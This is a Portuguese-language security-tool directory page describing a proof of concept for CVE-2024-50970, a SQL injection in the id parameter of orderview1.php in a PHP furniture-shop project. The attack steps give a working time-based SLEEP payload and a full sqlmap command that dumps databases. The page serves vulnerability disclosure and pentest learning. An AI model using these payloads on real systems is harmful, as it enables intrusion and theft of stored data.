Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-50970 — Prova de conceito para CVE-2024-50970: injeção SQL no Itsourcecode Online Furniture Shopping Project 1.0. Demonstra exploração através do parâmetro id em orderview1.php com payloads baseados em tempo e integração com SQLMap. | Kitploit
Ferramentas/GitHubGitHub/akhlak2511/cve-2024-50970
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

Prova de conceito para CVE-2024-50970: injeção SQL no Itsourcecode Online Furniture Shopping Project 1.0. Demonstra exploração através do parâmetro id em orderview1.php com payloads baseados em tempo e integração com SQLMap.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-50970

Descrição

Uma vulnerabilidade de injeção de SQL em orderview1.php do Itsourcecode Online Furniture Shopping Project 1.0 permite que atacantes remotos executem comandos SQL arbitrários através do parâmetro id.

Tipo de Vulnerabilidade

Injeção de SQL

Fornecedor do Produto

Itsourcecode

Base de Código do Produto Afetado:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

Componente Afetado:

O Itsourcecode Online Furniture Shopping v1.0 é vulnerável a injeção de SQL através do parâmetro id na página orderview1.php

Vetores de Ataque:

  1. Configure a aplicação localmente, registre uma conta e faça login com a conta recém-registrada.
  2. Navegue até a seguinte URL no seu navegador: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  3. Injete o Payload SQL: Modifique o parâmetro id na URL para incluir um payload de injeção SQL baseado em tempo. http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  4. Observe a Resposta da Aplicação: A página deve demorar visivelmente mais (10 segundos) para carregar se a injeção for bem-sucedida, confirmando que o parâmetro id está vulnerável a injeção de SQL.
  5. Agora use a ferramenta SQLMap para exploração adicional e extração de bancos de dados usando o comando abaixo: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast

Referência:

  1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Baixar ferramenta